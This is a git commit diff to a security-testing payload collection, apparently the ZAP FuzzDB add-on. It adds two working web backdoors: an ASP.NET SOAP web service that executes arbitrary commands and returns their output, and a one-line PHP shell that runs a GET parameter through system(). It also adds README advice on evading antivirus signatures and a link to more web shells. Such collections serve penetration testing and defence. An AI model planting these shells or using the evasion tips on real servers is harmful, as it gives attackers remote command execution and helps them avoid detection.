Update from upstream

Signed-off-by: kingthorin <kingthorin@users.noreply.github.com>

Author: kingthorin

CHANGELOG.md

@@ -7,6 +7,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 ### Changed
 - Do not set the background colour of the help page.
 - Migrated 'attack' directory and components from main FuzzDB add-on, due to anti-virus considerations (Issue 5972).
+- Updated from upstream.
 
 ## [2] - 2020-01-30
 ### Added

src/main/zapHomeFiles/fuzzers/fuzzdb/attack/all-attacks/all-attacks-unix.txt

@@ -1,3 +1,4 @@
+
 !
 !'
 !@#$%%^#$%#$@#$%$$@#$%^^**(()

src/main/zapHomeFiles/fuzzers/fuzzdb/web-backdoors/README.md

@@ -3,6 +3,8 @@ Web backdoors from the wild, collected during incident response, submitted, and
 Antivirus/antimalware bypass:
 Most antivirus/antimalware/waf/ids/etc will flag on these immediately, deleting a payload that otherwise could have been successfully uploaded. Basic evasion techniques are likely to work. Try modifying the code so that it's different enough to not trigger pattern-based signatures. Examples - delete comments, replace function names, replace variable names. 
 
+This repo has many more: https://github.com/xl7dev/WebShell
+
 ----------------------------------------
 
 Laudanum-1.0 files credits:

src/main/zapHomeFiles/fuzzers/fuzzdb/web-backdoors/asp/cmd.asmx

@@ -0,0 +1,88 @@
+<%--
+
+Usage:
+
+POST /test.asmx HTTP/1.1
+Host: example.com
+Content-Type: text/xml; charset=utf-8
+Content-Length: 363
+SOAPAction: "http://tempuri.org/Test"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <Test xmlns="http://tempuri.org/">
+      <Z1>cmd.exe</Z1>
+      <Z2>/c net user</Z2>
+    </Test>
+  </soap:Body>
+</soap:Envelope>
+
+--%>
+
+<%@ WebService Language="C#" Class="Service" %>
+using System;
+using System.Web;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Data;
+using System.Data.SqlClient;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Web.SessionState;
+using System.Web.Services;
+using System.Xml;
+using System.Web.Services.Protocols;
+
+[WebService(Namespace = "http://www.payloads.online/")]
+[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
+
+public class New_Process :Process
+{
+    public New_Process(string s)
+    {
+            
+    }
+
+}
+
+
+public class Service : System.Web.Services.WebService
+{
+    public Service()
+    {
+
+    }
+
+    [WebMethod]
+    public string Test(string Z1,string Z2)
+    {
+        String R;
+
+        ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
+        Process e = new New_Process("something");
+        StreamReader OT, ER;
+        c.UseShellExecute = false;
+        c.RedirectStandardOutput = true;
+        c.RedirectStandardError = true;
+        e.StartInfo = c;
+        
+        e.Start();
+        OT = e.StandardOutput;
+        ER = e.StandardError;
+        e.Close();
+        R = OT.ReadToEnd() + ER.ReadToEnd();
+        HttpContext.Current.Response.Clear();
+        HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
+        HttpContext.Current.Response.Write("<data>");
+        HttpContext.Current.Response.Write("<![CDATA[");
+        HttpContext.Current.Response.Write("\x2D\x3E\x7C");
+        HttpContext.Current.Response.Write(R);
+        HttpContext.Current.Response.Write("\x7C\x3C\x2D");
+        HttpContext.Current.Response.Write("]]>");
+        HttpContext.Current.Response.Write("</data>");
+        HttpContext.Current.Response.End();
+        return R;
+    }
+}

src/main/zapHomeFiles/fuzzers/fuzzdb/web-backdoors/php/tiny.php

@@ -0,0 +1,5 @@
+<?php
+if($_GET['c']) {
+system($_GET['c']);
+}
+?>